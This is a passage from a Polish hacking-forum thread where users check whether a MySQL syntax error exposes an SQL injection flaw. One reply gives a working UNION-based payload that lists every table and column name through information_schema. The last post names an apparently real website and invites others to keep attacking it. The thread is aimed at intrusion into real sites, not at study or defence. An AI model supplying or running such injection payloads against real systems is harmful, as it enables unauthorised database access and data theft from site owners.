błędy pozwalające na sqli

[s7r0nt]

Jesli ktoś mógłby mi powiedzieć czy błędy typu

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-spacere;overflow:auto'>1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server
version for the right syntax to use near '\' AND v_category = '1''
at line 1 in: SELECT * FROM vm_menu WHERE id = 495\'
AND v_category = '1'</div>

pozwalają na atak

Byłbym wdzięczny

 

[unlock]

jes of kors

 

[sinis]

Albo mi się wydaje, albo jest włączone slashowanie...

 

[amex]

Albo mi się wydaje, albo jest włączone slashowanie...[/b]

raczej nie inaczej...:

WHERE id = 495\' [/b]

 

[Magnefikko]

SELECT * FROM vm_menu WHERE id = 495\' 
AND v_category = '1'

Po co próbowałeś apostrofu? Tu ich nie masz.

SELECT * FROM vm_menu WHERE id = 495 and 1=2 union select 1, concat(table_name, char(58), column_name), 3, 4, 5 from information_schema.columns union select * from vm_menu where 1=2 AND v_category = '1'

495 and 1=2 union select 1, concat(table_name, char(58), column_name), 3, 4, 5 from information_schema.columns union select * from vm_menu where 1=2

Wychodzę z założenia że skrypt nie przepuści komentarza, więc takie rozwiązanie wydaje mi się najlepsze.

No i liczba kolumn tylko przykładowa.

 

[unlock]

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and as_numer_strony='2'' at line 1)
Session halted.
takie cos dostaje, as_numer_strony to jest to cos=2
obczajcie sami moze cos sie uda wykombinowac bo mi rece opadaja :
klubinformatyka.pl